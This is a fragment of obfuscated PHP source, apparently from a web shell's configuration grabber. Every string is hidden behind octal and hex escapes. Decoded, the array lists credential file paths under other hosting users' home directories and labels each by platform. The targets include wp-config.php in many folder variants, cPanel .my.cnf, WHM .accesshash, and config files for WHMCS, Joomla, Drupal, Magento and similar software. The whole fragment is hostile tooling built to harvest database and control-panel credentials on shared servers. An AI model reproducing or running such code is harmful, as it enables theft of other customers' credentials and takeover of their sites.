"\127\x6f\162\x64\x50\x72\145\163\163\115\x61\x69\x6e", "\x2f\150\157\x6d\x65\61\57{$user_cox}\x2f\x70\x75\x62\x6c\151\x63\137\150\164\155\154\x2f\155\x61\x69\156\57\x77\x70\55\143\x6f\156\146\151\x67\56\160\150\160" => "\x57\157\162\x64\x50\162\x65\163\x73\115\141\151\x6e", "\57\x68\157\x6d\145\x31\57{$user_cox}\x2f\160\x75\x62\154\x69\x63\x5f\150\x74\x6d\x6c\57\102\154\x6f\x67\57\x77\x70\x2d\x63\x6f\156\x66\151\147\x2e\160\150\x70" => "\127\157\x72\x64\120\162\x65\163\x73\102\154\x6f\147", "\57\x68\x6f\x6d\145\61\57{$user_cox}\57\160\x75\142\154\x69\x63\x5f\x68\164\x6d\154\57\x42\114\x4f\x47\57\x77\160\x2d\143\157\x6e\146\151\147\56\160\x68\x70" => "\127\157\162\144\x50\162\x65\163\x73\102\x6c\x6f\147", "\x2f\x68\157\x6d\145\x31\57{$user_cox}\x2f\160\x75\142\x6c\151\x63\x5f\150\164\155\x6c\x2f\142\154\x6f\147\57\x77\160\x2d\x63\157\156\146\x69\147\56\x70\x68\x70" => "\x57\157\162\144\x50\162\145\x73\x73\102\154\x6f\147", "\x2f\150\157\x6d\x65\x31\x2f{$user_cox}\x2f\160\x75\142\154\151\x63\x5f\x68\x74\x6d\154\57\102\x6c\157\x67\163\57\x77\x70\x2d\143\157\156\146\x69\x67\56\160\150\x70" => "\x57\157\162\x64\x50\162\x65\x73\x73\102\154\157\x67\163", "\57\150\157\155\145\x31\57{$user_cox}\x2f\x70\x75\142\x6c\151\x63\137\150\x74\x6d\x6c\57\x42\x4c\x4f\x47\123\57\x77\x70\55\143\157\x6e\x66\x69\x67\x2e\160\150\x70" => "\127\x6f\x72\144\x50\162\x65\x73\x73\x42\154\x6f\147\x73", "\x2f\x68\x6f\x6d\x65\61\57{$user_cox}\57\x70\165\142\154\151\x63\137\150\164\x6d\154\x2f\142\x6c\x6f\x67\163\x2f\167\x70\55\x63\x6f\x6e\x66\151\147\x2e\x70\150\160" => "\127\x6f\x72\144\120\162\145\x73\163\102\154\x6f\147\163", "\x2f\x68\x6f\155\x65\61\57{$user_cox}\57\x70\165\142\154\x69\x63\137\x68\164\155\x6c\57\x62\x65\x74\x61\x2f\x77\160\55\143\157\x6e\x66\151\147\56\160\150\x70" => "\x57\157\162\x64\120\x72\145\163\x73\x42\145\164\x61", "\57\150\157\x6d\x65\61\57{$user_cox}\x2f\160\165\x62\154\151\x63\x5f\x68\x74\155\154\x2f\102\x65\x74\x61\x2f\x77\x70\55\143\x6f\x6e\x66\x69\x67\56\x70\x68\160" => "\x57\x6f\x72\144\120\162\x65\x73\x73\102\145\164\x61", "\x2f\x68\157\x6d\145\x31\x2f{$user_cox}\x2f\160\165\x62\154\x69\x63\137\x68\164\x6d\154\57\102\x45\124\101\57\167\160\55\143\157\156\x66\151\x67\x2e\160\150\x70" => "\x57\x6f\x72\144\120\x72\145\163\163\x42\x65\164\x61", "\57\x68\157\x6d\145\61\57{$user_cox}\57\160\x75\x62\154\x69\x63\137\150\164\x6d\154\x2f\120\x52\105\x53\x53\57\x77\x70\x2d\x63\157\x6e\x66\151\x67\56\160\x68\x70" => "\127\x6f\x72\144\120\x72\x65\163\x73\x50\x72\145\163\x73", "\57\x68\x6f\155\145\x31\x2f{$user_cox}\x2f\160\x75\142\x6c\151\143\137\x68\164\155\154\57\120\162\x65\163\163\57\167\160\55\143\157\x6e\146\151\x67\x2e\160\150\160" => "\x57\x6f\162\x64\x50\162\x65\x73\163\120\x72\x65\163\x73", "\57\150\x6f\x6d\x65\x31\57{$user_cox}\x2f\160\165\x62\154\x69\x63\x5f\150\x74\155\x6c\57\160\x72\145\x73\163\57\167\160\55\143\x6f\156\x66\x69\147\56\x70\x68\160" => "\127\x6f\x72\144\120\x72\x65\163\x73\120\162\x65\x73\163", "\57\150\157\155\145\x31\x2f{$user_cox}\57\160\x75\x62\154\151\143\137\150\x74\x6d\x6c\x2f\127\160\x2f\x77\160\x2d\143\x6f\x6e\146\151\147\56\160\150\160" => "\x57\157\x72\x64\x50\162\145\163\163\x57\160", "\57\150\157\155\145\x31\x2f{$user_cox}\57\x70\165\x62\x6c\151\x63\x5f\150\x74\x6d\x6c\x2f\x77\160\57\167\x70\x2d\143\x6f\x6e\146\x69\147\56\160\x68\x70" => "\127\157\x72\144\x50\x72\145\163\x73\127\160", "\57\150\157\155\145\61\x2f{$user_cox}\x2f\x70\165\142\154\151\143\137\150\x74\155\154\x2f\x57\x50\x2f\167\x70\x2d\x63\x6f\156\146\151\147\x2e\160\x68\x70" => "\127\x6f\x72\x64\x50\162\x65\163\x73\x57\x50", "\x2f\150\x6f\155\145\61\57{$user_cox}\x2f\160\x75\142\x6c\151\143\x5f\150\164\x6d\154\57\160\157\162\x74\141\x6c\x2f\x77\160\55\143\157\156\146\151\x67\x2e\x70\150\x70" => "\x57\157\x72\x64\120\162\145\x73\163\120\157\162\164\x61\x6c", "\x2f\150\x6f\155\x65\61\57{$user_cox}\57\x70\165\142\154\x69\143\137\x68\x74\x6d\x6c\x2f\x50\x4f\x52\124\101\x4c\57\167\x70\x2d\x63\x6f\x6e\x66\x69\x67\x2e\x70\x68\160" => "\127\x6f\162\144\120\x72\x65\x73\163\120\157\x72\164\x61\x6c", "\x2f\150\x6f\x6d\145\61\57{$user_cox}\57\160\165\x62\154\x69\x63\137\x68\x74\155\154\57\120\157\x72\164\141\154\57\x77\160\x2d\x63\x6f\x6e\146\x69\147\56\160\x68\160" => "\127\157\x72\144\x50\x72\145\x73\x73\120\157\162\x74\x61\x6c", "\57\150\x6f\x6d\145\62\57{$user_cox}\x2f\56\155\x79\56\x63\156\146" => "\x63\160\x61\156\145\x6c", "\x2f\150\x6f\x6d\x65\62\57{$user_cox}\57\x2e\x61\143\143\x65\x73\163\x68\x61\163\x68" => "\127\110\x4d\55\x61\143\143\145\x73\x73\150\x61\163\x68", "\57\x68\x6f\155\x65\62\57{$user_cox}\57\160\x75\x62\x6c\151\143\x5f\150\x74\155\154\57\142\167\55\x63\x6f\156\x66\x69\147\x73\x2f\143\x6f\x6e\146\x69\147\x2e\x69\156\x69" => "\x42\x6f\x73\x57\145\142", "\57\x68\157\155\145\x32\57{$user_cox}\x2f\160\x75\142\154\151\x63\137\x68\164\x6d\x6c\57\x63\157\x6e\x66\x69\x67\57\153\x6f\x6e\x65\x6b\163\x69\x2e\x70\150\160" => "\114\157\x6b\x6f\x6d\145\144\x69\x61", "\57\x68\x6f\155\145\62\x2f{$user_cox}\x2f\x70\165\142\154\x69\x63\137\x68\164\155\x6c\57\x6c\x6f\153\157\155\x65\x64\151\x61\57\x63\157\x6e\146\x69\x67\x2f\153\157\156\145\153\x73\x69\56\160\x68\x70" => "\x4c\x6f\153\157\x6d\145\x64\151\141", "\x2f\x68\157\155\145\62\57{$user_cox}\57\160\x75\142\154\151\x63\x5f\150\x74\x6d\x6c\x2f\143\x6c\151\x65\x6e\x74\141\x72\145\x61\57\143\157\x6e\x66\151\x67\165\x72\141\x74\x69\x6f\156\x2e\160\x68\x70" => "\x57\x48\x4d\x43\123", "\x2f\150\157\155\x65\62\57{$user_cox}\x2f\160\x75\142\154\151\143\137\x68\x74\155\x6c\x2f\x77\150\x6d\x63\x73\57\x63\157\156\146\151\x67\x75\x72\141\x74\x69\x6f\156\56\160\x68\160" => "\x57\110\115\103\x53", "\x2f\150\157\x6d\145\62\57{$user_cox}\57\160\165\x62\154\151\x63\x5f\150\x74\x6d\154\x2f\x66\157\x72\x75\155\x2f\143\x6f\x6e\x66\151\x67\x2e\160\150\160" => "\x70\x68\x70\102\x42", "\x2f\150\157\155\x65\62\x2f{$user_cox}\x2f\x70\x75\x62\154\151\x63\137\x68\164\x6d\x6c\57\163\151\164\145\x73\57\x64\145\146\141\165\x6c\x74\x2f\x73\x65\x74\x74\151\x6e\x67\x73\56\160\x68\160" => "\x44\162\x75\x70\141\154", "\x2f\x68\157\x6d\x65\62\x2f{$user_cox}\57\x70\x75\x62\x6c\151\143\137\x68\x74\x6d\x6c\57\143\157\x6e\x66\151\x67\57\163\x65\164\164\151\156\x67\x73\56\151\x6e\x63\x2e\160\150\160" => "\x50\162\145\x73\164\x61\123\150\x6f\160", "\x2f\150\x6f\x6d\x65\x32\57{$user_cox}\x2f\160\x75\142\154\151\x63\x5f\150\x74\155\154\57\x61\x70\160\57\x65\x74\143\57\x6c\157\x63\141\154\x2e\170\x6d\x6c" => "\x4d\x61\147\145\156\164\157", "\x2f\150\157\x6d\x65\62\x2f{$user_cox}\x2f\160\165\x62\x6c\x69\143\x5f\150\164\155\154\57\x61\x64\x6d\151\x6e\x2f\x63\x6f\156\146\x69\147\56\160\x68\160" => "\x4f\160\x65\x6e\103\x61\x72\x74", "\57\150\x6f\x6d\x65\x32\x2f{$user_cox}\57\x70\165\142\x6c\151\143\x5f\150\164\155\154\57\x73\154\143\157\156\146\151\147\56\160\x68\x70" => "\x53\x69\x74\145\154\157\153", "\x2f\150\157\155\x65\62\x2f{$user_cox}\x2f\x70\165\x62\154\x69\x63\x5f\x68\x74\155\154\57\x61\x70\x70\x6c\x69\x63\x61\164\151\x6f\156\x2f\x63\x6f\x6e\x66\x69\x67\57\x64\141\x74\141\142\141\x73\x65\56\x70\150\x70" => "\105\154\154\x69\163\154\x61\x62", "\x2f\x68\157\x6d\145\x32\57{$user_cox}\x2f\160\165\x62\154\x69\x63\137\150\164\155\154\x2f\x77\150\155\57\143\157\x6e\x66\x69\x67\165\x72\x61\164\x69\157\x6e\56\160\x68\160" => "\x57\x48\x4d\x43\123", "\x2f\x68\157\155\x65\62\57{$user_cox}\x2f\x70\165\142\x6c\151\x63\137\150\164\155\154\x2f\167\x68\x6d\x63\57\127\110\x4d\57\143\157\156\146\151\x67\165\162\141\x74\151\x6f\156\56\x70\150" => "\x57\x48\x4d\x43", "\x2f\x68\157\x6d\145\x32\x2f{$user_cox}\57\x70\x75\x62\154\x69\x63\x5f\x68\x74\x6d\x6c\57\x63\145\156\x74\162\x61\154\x2f\x63\x6f\x6e\x66\x69\x67\x75\x72\x61\x74\151\157\156\56\x70\x68\x70" => "\x57\x48\x4d\x20\x43\x65\156\164\162\x61\154", "\x2f\x68\x6f\x6d\145\x32\x2f{$user_cox}\57\x70\165\142\154\151\x63\137\150\x74\x6d\154\x2f\167\x68\155\x2f\127\110\x4d\x43\x53\x2f\x63\x6f\x6e\146\x69\x67\x75\x72\x61\164\151\x6f\156\56\x70\150\x70" => "\127\x48\x4d\x43\123", "\x2f\150\157\155\145\x32\57{$user_cox}\57\160\165\142\x6c\x69\x63\x5f\x68\164\155\154\57\x77\150\155\x2f\x77\x68\155\x63\163\57\x63\157\x6e\146\x69\147\x75\162\141\x74\151\157\156\x2e\x70\x68\x70" => "\127\x48\115\x43\x53", "\57\x68\x6f\155\x65\x32\x2f{$user_cox}\x2f\x70\x75\142\x6c\151\x63\137\x68\164\x6d\154\x2f\163\x75\x62\155\x69\x74\164\151\143\x6b\x65\164\x2e\x70\150\x70" => "\x57\x48\x4d\x43\123", "\x2f\x68\x6f\x6d\145\62\57{$user_cox}\57\x70\x75\142\154\151\143\x5f\x68\164\x6d\x6c\57\x63\157\x6e\x66\151\x67\x75\162\141\x74\x69\x6f\156\56\x70\x68\x70" => "\112\157\157\x6d\x6c\141", "\57\150\157\x6d\145\62\x2f{$user_cox}\x2f\160\165\x62\154\x69\143\137\x68\164\x6d\154\57\112\157\157\x6d\x6c\141\57\143\x6f\156\x66\x69\x67\165\162\x61\164\151\157\x6e\56\160\150\x70" => "\112\x6f\157\x6d\154\x61\x4a\157\157\155\154\141", "\57\150\157\155\145\x32\x2f{$user_cox}\57\160\x75\x62\x6c\151\x63\x5f\x68\x74\x6d\x6c\57\x6a\x6f\x6f\x6d\154\x61\57\143\x6f\x6e\x66\151\147\x75\x72\x61\x74\x69\157\156\x2e\160\150\x70" => "\112\157\157\155\x6c\x61\112\157\x6f\155\x6c\x61", "\57\150\x6f\x6d\145\62\57{$user_cox}\57\x70\165\x62\154\x69\143\137\x68\x74\x6d\x6c\57\x4a\x4f\x4f\x4d\x4c\x41\x2f\x63\x6f\x6e\x66\151\147\x75\162\x61\164\151\157\156\56\x70\150\160" => "\x4a\x6f\x6f\155\x6c\x61\112\157\x6f\x6d\x6c\141", "\57\x68\x6f\x6d\x65\62\57{$user_cox}\x2f\x70\x75\x62\x6c\151\143\x5f\x68\164\x6d\154\x2f\x48\157\x6d\x65\57\143\157\156\x66\x69\x67\x75\x72\x61\164\x69\x6f\x6e\x2e\x70\150\x70" => "\x4a\x6f\x6f\x6d\154\x61\x48\157\x6d\145", "\x2f\150\157\155\x65\62\57{$user_cox}\x2f\160\x75\x62\154\x69\x63\137\x68\x74\155\x6c\x2f\x48\117\x4d\x45\x2f\x63\x6f\156\x66\x69\147\165\x72\x61\164\x69\157\156\x2e\160\150\160" => "\x4a\x6f\157\x6d\x6c\141\110\x6f\155\145", "\57\x68\157\155\x65\62\x2f{$user_cox}\57\160\165\142\x6c\x69\143\137\x68\164\155\x6c\x2f\150\x6f\155\x65\57\143\x6f\156\146\x69\x67\x75\x72\141\164\x69\x6f\156\56\160\x68\x70" => "\112\x6f\157\155\154\141\x48\x6f\155\x65", "\x2f\150\157\155\x65\x32\x2f{$user_cox}\57\x70\x75\x62\x6c\151\143\x5f\150\164\155\x6c\x2f\x4e\105\127\x2f\143\x6f\156\146\x69\147\x75\x72\141\164\x69\157\156\56\160\x68\160" => "\112\x6f\157\155\x6c\x61\116\145\167", "\57\150\157\155\145\62\x2f{$user_cox}\57\160\x75\x62\x6c\x69\143\137\x68\164\x6d\x6c\57\x4e\x65\x77\57\143\x6f\156\146\x69\147\165\x72\x61\164\x69\157\x6e\56\160\150\x70" => "\112\157\x6f\155\154\141\x4e\145\x77", "\57\x68\157\155\145\62\57{$user_cox}\x2f\x70\x75\142\154\x69\x63\137\150\164\x6d\x6c\x2f\x6e\145\x77\57\143\x6f\x6e\146\151\x67\x75\x72\x61\164\151\157\156\56\160\x68\x70" => "\x4a\x6f\157\x6d\x6c\141\116\145\x77", "\57\x68\157\x6d\x65\x32\57{$user_cox}\57\x70\x75\142\x6c\x69\143\x5f\x68\164\x6d\x6c\x2f\x4e\145\167\x73\57\143\157\156\146\x69\x67\165\x72\141\164\x69\x6f\156\56\160\150\160" => "\112\157\157\155\x6c\x61\x4e\145\x77\x73", "\57\150\x6f\155\x65\62\57{$user_cox}\57\x70\165\142\x6c\x69\143\x5f\x68\x74\x6d\x6c\57\x4e\x45\x57\x53\x2f\143\157\156\146\151\x67\x75\162\x61\164\x69\157\x6e\x2e\160\150\x70" => "\112\x6f\157\x6d\154\x61\116\145\167\x73", "\x2f\150\157\x6d\145\x32\x2f{$user_cox}\57\160\165\142\154\x69\x63\137\x68\164\x6d\154\57\x6e\145\x77\163\x2f\143\157\156\146\x69\147\165\162\x61\164\x69\x6f\156\56\160\150\x70" => "\x4a\157\x6f\x6d\154\141\116\145\167\163", "\57\x68\157\155\145\x32\57{$user_cox}\57\160\165\142\154\x69\x63\137\x68\x74\155\154\x2f\x43\155\163\57\143\157\156\x66\151\x67\165\162\x61\164\151\157\x6e\x2e\160\x68\160" => "\112\157\157\x6d\x6c\x61\103\x6d\163", "\x2f\150\157\x6d\145\x32\x2f{$user_cox}\57\x70\x75\142\x6c\151\x63\137\150\x74\155\x6c\57\x43\115\x53\x2f\x63\x6f\156\146\151\147\165\x72\141\x74\x69\x6f\x6e\56\160\150\160" => "\112\157\157\155\154\141\x43\155\x73", "\x2f\150\x6f\x6d\x65\62\57{$user_cox}\57\160\165\142\154\x69\143\x5f\150\x74\x6d\x6c\57\143\x6d\163\x2f\143\157\x6e\146\151\147\x75\x72\x61\164\x69\x6f\156\56\160\x68\160" => "\x4a\157\157\155\x6c\141\103\x6d\x73", "\x2f\x68\157\x6d\x65\62\x2f{$user_cox}\57\x70\165\x62\154\151\x63\137\x68\x74\x6d\x6c\57\115\141\x69\156\57\143\157\156\146\151\x67\x75\162\x61\164\151\x6f\x6e\56\x70\x68\x70" => "\x4a\x6f\x6f\155\x6c\x61\115\x61\151\156", "\x2f\150\157\155\x65\62\57{$user_cox}\57\x70\165\142\x6c\x69\x63\137\x68\164\x6d\x6c\57\115\x41\x49\x4e\57\143\x6f\x6e\146\151\x67\165\162\x61\164\151\157\x6e\x2e\160\150\x70" => "\112\157\x6f\155\x6c\141\115\141\x69\x6e", "\57\x68\157\x6d\x65\62\x2f{$user_cox}\x2f\160\165\142\x6c\x69\x63\x5f\150\164\155\154\x2f\x6d\141\151\156\x2f\143\x6f\x6e\x66\151\147\x75\162\x61\164\x69\157\x6e\x2e\160\x68\160" => "\x4a\157\157\x6d\154\x61\x4d\x61\151\156", "\57\x68\157\x6d\x65\62\57{$user_cox}\57\x70\x75\142\154\x69\x63\x5f\x68\x74\x6d\154\x2f\102\154\157\147\57\143\x6f\x6e\146\x69\x67\x75\162\x61\x74\151\157\156\56\x70\x68\x70" => "\112\157\157\x6d\x6c\141\102\154\x6f\x67", "\x2f\150\157\155\x65\x32\x2f{$user_cox}\x2f\160\165\142\154\151\143\x5f\150\x74\x6d\x6c\57\x42\114\117\x47\x2f\x63\x6f\x6e\x66\151\x67\165\162\141\164\x69\157\x6e\x2e\160\x68\x70" => "\112\157\157\x6d\154\x61\x42\154\157\147", "\57\150\157\155\x65\x32\57{$user_cox}\57\x70\165\x62\154\x69\x63\137\150\164\155\154\57\142\x6c\x6f\x67\x2f\143\157\156\x66\x69\147\x75\x72\x61\164\x69\157\156\56\x70\150\160" => "\x4a\x6f\x6f\x6d\154\141\102\154\x6f\x67", "\x2f\x68\x6f\155\145\x32\x2f{$user_cox}\57\x70\165\x62\154\x69\x63\x5f\x68\x74\155\x6c\x2f\102\154\157\x67\163\57\143\x6f\x6e\146\x69\x67\x75\x72\141\164\151\x6f\156\x2e\x70\x68\x70" => "\x4a\x6f\157\x6d\154\x61\102\x6c\157\x67\163", "\x2f\x68\157\x6d\x65\x32\x2f{$user_cox}\x2f\x70\165\142\154\x69\143\x5f\x68\x74\x6d\154\57\x42\114\x4f\x47\x53\x2f\x63\157\x6e\x66\151\147\165\x72\x61\164\151\157\x6e\56\160\150\x70" => "\x4a\x6f\157\155\154\141\x42\x6c\157\147\x73", "\57\x68\x6f\x6d\145\62\57{$user_cox}\x2f\x70\165\x62\154\151\143\x5f\150\164\x6d\x6c\x2f\x62\x6c\x6f\147\163\57\x63\157\x6e\x66\x69\147\165\162\x61\164\151\157\x6e\x2e\x70\150\160" => "\x4a\x6f\x6f\x6d\x6c\141\x42\x6c\157\x67\163", "\57\x68\157\x6d\145\x32\x2f{$user_cox}\x2f\x70\165\x62\154\151\143\137\150\x74\x6d\154\x2f\142\x65\164\141\57\x63\157\156\x66\x69\147\165\x72\x61\x74\151\157\156\x2e\160\x68\x70" => "\x4a\x6f\157\x6d\154\141\x42\145\164\x61", "\x2f\150\157\x6d\145\x32\57{$user_cox}\57\x70\165\x62\154\151\143\x5f\150\164\x6d\154\57\102\145\164\141\x2f\143\157\156\146\x69\147\165\162\x61\164\x69\157\x6e\x2e\x70\150\x70" => "\x4a\157\x6f\x6d\154\x61\x42\145\x74\x61", "\x2f\x68\x6f\155\x65\62\57{$user_cox}\x2f\x70\x75\x62\154\151\143\137\x68\x74\155\154\x2f\x42\x45\x54\101\x2f\143\157\156\146\x69\x67\x75\x72\x61\164\x69\x6f\156\x2e\x70\x68\160" => "\x4a\x6f\x6f\155\154\x61\102\145\x74\141", "\57\150\x6f\155\145\62\57{$user_cox}\57\160\165\x62\154\x69\x63\x5f\150\164\x6d\x6c\x2f\x50\122\105\x53\123\57\x63\157\156\x66\x69\147\165\162\x61\x74\x69\157\156\x2e\160\x68\x70" => "\112\157\157\x6d\154\x61\120\x72\145\163\163", "\x2f\150\x6f\155\x65\x32\x2f{$user_cox}\57\x70\165\142\x6c\x69\143\x5f\x68\x74\x6d\154\x2f\120\x72\x65\163\x73\57\x63\x6f\156\x66\x69\147\165\x72\141\x74\151\157\x6e\x2e\x70\x68\160" => "\x4a\x6f\x6f\x6d\x6c\x61\120\162\145\163\163", "\57\150\157\x6d\145\62\x2f{$user_cox}\57\160\165\142\x6c\151\143\137\x68\164\x6d\x6c\57\x70\162\x65\x73\163\x2f\143\x6f\156\x66\x69\147\x75\x72\141\164\151\x6f\x6e\x2e\x70\x68\x70" => "\112\x6f\157\x6d\154\141\120\162\x65\163\163", "\57\150\x6f\155\145\x32\x2f{$user_cox}\57\x70\165\142\154\151\x63\x5f\150\x74\155\x6c\x2f\x57\x70\x2f\x63\157\156\x66\151\147\x75\x72\x61\x74\151\x6f\x6e\x2e\x70\150\x70" => "\x4a\x6f\x6f\155\154\x61\127\160", "\x2f\x68\x6f\155\x65\x32\57{$user_cox}\x2f\x70\165\142\x6c\x69\x63\x5f\150\x74\x6d\154\x2f\167\160\57\x63\x6f\x6e\146\151\x67\x75\162\x61\x74\x69\157\x6e\56\x70\x68\160" => "\x4a\157\x6f\x6d\x6c\x61\x57\x70", "\x2f\x68\x6f\155\x65\62\x2f{$user_cox}\57\x70\165\142\x6c\151\x63\x5f\x68\x74\155\154\x2f\127\120\x2f\143\x6f\x6e\146\x69\147\x75\162\x61\164\x69\x6f\x6e\x2e\160\x68\160" => "\x4a\157\x6f\x6d\154\141\x57\120", "\x2f\150\157\155\x65\62\x2f{$user_cox}\57\x70\x75\x62\154\151\x63\x5f\150\x74\155\154\x2f\160\x6f\162\x74\141\154\57\143\157\x6e\146\151\147\165\x72\141\x74\151\x6f\156\56\160\x68\x70" => "\x4a\x6f\157\155\x6c\x61\x50\x6f\162\164\x61\154", "\57\150\x6f\155\x65\x32\x2f{$user_cox}\x2f\x70\x75\142\x6c\x69\x63\x5f\x68\x74\x6d\154\57\x50\117\x52\x54\101\x4c\57\143\157\x6e\x66\151\x67\165\x72\141\x74\x69\x6f\x6e\x2e\160\150\x70" => "\x4a\x6f\x6f\x6d\154\x61\x50\157\162\x74\141\154", "\x2f\x68\x6f\155\145\x32\57{$user_cox}\57\160\165\142\154\151\x63\x5f\150\x74\x6d\154\x2f\120\x6f\162\164\141\154\x2f\x63\157\x6e\146\x69\x67\x75\x72\x61\164\151\157\x6e\56\x70\x68\160" => "\x4a\x6f\x6f\155\x6c\x61\120\157\162\164\x61\x6c", "\57\x68\x6f\155\145\x32\x2f{$user_cox}\57\160\x75\142\154\151\x63\137\150\x74\155\154\x2f\x77\x70\55\143\x6f\x6e\x66\151\x67\56\x70\x68\160" => "\127\x6f\x72\x64\x50\x72\145\x73\x73", "\x2f\x68\157\x6d\145\62\x2f{$user_cox}\57\160\165\142\154\x69\143\137\x68\x74\155\x6c\x2f\x77\157\162\x64\160\162\x65\163\163\57\167\x70\55\x63\x6f\x6e\x66\151\147\x2e\160\150\160" => "\x57\x6f\x72\x64\x50\x72\145\x73\x73\x57\157\162\144\160\162\145\163\x73", "\x2f\x68\x6f\155\145\62\x2f{$user_cox}\x2f\x70\165\142\x6c\x69\x63\137\x68\164\x6d\154\x2f\x57\x6f\x72\x64\160\x72\x65\163\163\x2f\x77\160\55\143\x6f\x6e\x66\x69\x67\56\160\150\160" => "\127\157\162\x64\x50\x72\x65\163\x73\x57\x6f\x72\x64\x70\162\x65\x73\x73", "\x2f\x68\157\155\x65\x32\57{$user_cox}\x2f\x70\x75\142\x6c\151\x63\137\x68\164\x6d\154\x2f\x57\117\x52\104\120\x52\105\123\x53\57\x77\160\55\143\x6f\156\x66\x69\147\x2e\160\150\160" => "\127\157\x72\144\120\162\145\x73\163\127\157\162\x64\160\162\x65\x73\163", "\x2f\150\157\155\x65\62\x2f{$user_cox}\x2f\160\x75\142\x6c\x69\143\137\150\164\155\x6c\57\x48\x6f\155\145\57\x77\160\x2d\x63\x6f\x6e\x66\151\147\56\x70\x68\160" => "\127\157\x72\144\120\162\x65\163\163\110\157\155\x65", "\57\150\x6f\x6d\x65\x32\57{$user_cox}\57\x70\x75\142\x6c\x69\143\x5f\x68\164\155\x6c\x2f\110\x4f\115\105\57\167\x70\55\143\x6f\x6e\x66\x69\147\x2e\x70\x68\x70" => "\127\x6f\x72\x64\x50\x72\145\163\x73\110\x6f\155\145", "\x2f\150\x6f\x6d\145\x32\x2f{$user_cox}\57\x70\x75\x62\x6c\151\x63\137\150\x74\155\x6c\x2f\150\x6f\x6d\145\x2f\x77\x70\55\143\x6f\x6e\146\x69\147\x2e\160\150\160" => "\x57\157\x72\144\x50\x72\x65\x73\x73\x48\157\x6d\x65", "\x2f\150\157\x6d\145\62\x2f{$user_cox}\57\x70\165\142\x6c\x69\x63\x5f\150\164\155\154\x2f\x4e\105\x57\57\x77\160\x2d\143\x6f\x6e\146\151\x67\x2e\160\150\x70" => "\127\157\x72\144\x50\x72\145\x73\x73\116\x65\x77", "\57\150\x6f\x6d\x65\x32\x2f{$user_cox}\57\x70\165\142\x6c\x69\143\x5f\150\164\155\x6c\x2f\x4e\x65\x77\x2f\x77\160\55\143\x6f\x6e\x66\x69\147\x2e\160\150\x70" => "\127\x6f\x72\144\120\x72\x65\163\163\116\x65\x77", "\x2f\150\x6f\155\x65\62\x2f{$user_cox}\57\160\x75\x62\154\x69\x63\137\x68\x74\x6d\154\x2f\156\x65\x77\x2f\x77\x70\55\143\x6f\x6e\x66\x69\147\56\160\x68\x70" => "\127\x6f\x72\144\x50\162\145\163\x73\116\x65\167", "\57\150\x6f\x6d\x65\62\57{$user_cox}\x2f\160\165\x62\x6c\x69\x63\x5f\x68\164\155\154\57\x4e\145\x77\x73\57\x77\x70\x2d\x63\x6f\x6e\x66\151\147\x2e\160\x68\x70" => "\127\x6f\x72\144\120\x72\x65\x73\163\x4e\x65\x77\163", "\x2f\150\x6f\155\x65\x32\x2f{$user_cox}\x2f\160\165\142\x6c\x69\143\137\x68\x74\155\x6c\x2f\x4e\x45\x57\x53\x2f\167\x70\x2d\143\x6f\x6e\146\151\x67\x2e\x70\150\x70" => "\x57\157\x72\144\120\x72\145\163\x73\116\x65\167\x73", "\57\150\x6f\x6d\145\x32\x2f{$user_cox}\x2f\x70\165\142\x6c\151\x63\137\150\x74\x6d\154\x2f\156\x65\167\x73\x2f\x77\160\x2d\143\x6f\156\146\x69\147\x2e\160\x68\160" => "\x57\x6f\x72\x64\x50\x72\x65\163\163\x4e\145\x77\x73", "\x2f\x68\157\x6d\145\x32\x2f{$user_cox}\57\160\165\142\154\151\x63\x5f\x68\x74\155\154\57\x43\x6d\x73\57\x77\x70\x2d\143\157\156\146\151\147\x2e\160\150\x70" => "\127\x6f\162\144\x50\162\145\163\163\x43\155\x73", "\57\150\157\x6d\145\62\x2f{$user_cox}\x2f\x70\x75\x62\154\x69\x63\137\150\164\155\x6c\x2f\x43\x4d\123\x2f\167\160\x2d\x63\x6f\x6e\146\151\147\56\160\150\160" => "\x57\157\x72\x64\120\162\145\x73\x73\103\x6d\163", "\57\x68\x6f\x6d\145\62\57{$user_cox}\x2f\x70\x75\x62\154\x69\143\x5f\150\164\155\x6c\x2f\x63\155\x73\x2f\167\160\x2d\x63\x6f\x6e\146\151\x67\56\160\x68\160" => "\127\x6f\x72\x64\120\x72\145\x73\x73\103\155\x73", "\x2f\150\157\x6d\x65\x32\x2f{$user_cox}\x2f\160\x75\x62\154\x69\143\137\150\164\x6d\154\57\115\141\151\x6e\x2f\167\160\55\x63\x6f\x6e\x66\151\x67\x2e\160\150\x70" => "\x57\157\x72\144\x50\162\145\x73\163\115\x61\x69\156", "\57\150\157\155\x65\62\x2f{$user_cox}\x2f\160\165\x62\154\151\143\x5f\x68\164\x6d\x6c\57\115\101\x49\116\x2f\x77\160\55\x63\157\x6e\x66\151\147\x2e\x70\150\x70" => "\127\x6f\162\144\x50\162\145\x73\x73\115\141\x69\156", "\x2f\150\x6f\155\145\x32\57{$user_cox}\x2f\160\x75\142\x6c\x69\x63\137\150\164\155\154\57\155\x61\x69\156\57\167\160\x2d\x63\157\x6e\x66\x69\x67\x2e\x70\150\160" => "\127\157\x72\144\x50\162\x65\x73\163\115\x61\x69\156", "\57\x68\x6f\155\145\x32\57{$user_cox}\57\x70\165\142\x6c\151\x63\137\x68\164\x6d\x6c\x2f\x42\154\x6f\x67\x2f\167\x70\55\x63\x6f\x6e\146\151\147\x2e\160\x68\x70" => "\127\x6f\x72\x64\x50\x72\x65\x73\163\x42\x6c\x6f\x67", "\57\x68\x6f\155\145\x32\x2f{$user_cox}\57\160\165\142\154\x69\x63\x5f\150\x74\155\154\57\102\114\x4f\107\57\x77\160\x2d\143\157\x6e\x66\151\147\x2e\x70\150\160" => "\x57\x6f\x72\144\120\162\x65\x73\x73\102\154\157\x67", "\x2f\x68\157\x6d\x65\62\x2f{$user_cox}\57\160\165\x62\154\x69\143\x5f\x68\x74\155\154\57\x62\154\x6f\147\57\167\x70\55\x63\x6f\156\x66\x69\147\56\x70\150\160" => "\x57\157\162\x64\x50\162\145\163\163\102\x6c\157\x67", "\57\x68\157\155\x65\x32\57{$user_cox}\x2f\x70\x75\x62\154\x69\x63\137\x68\x74\x6d\x6c\57\x42\x6c\x6f\x67\163\57\167\160\x2d\x63\x6f\x6e\x66\151\147\56\160\x68\x70" => "\127\157\x72\144\x50\162\x65\x73\x73\102\x6c\157\x67\163", "\57\x68\157\x6d\145\x32\x2f{$user_cox}\x2f\160\165\142\154\x69\x63\x5f\x68\x74\155\154\x2f\102\114\117\107\123\x2f\x77\x70\x2d\143\x6f\x6e\146\151\x67\56\160\150\160" => "\x57\x6f\x72\x64\x50\162\x65\163\163\102\x6c\157\x67\x73", 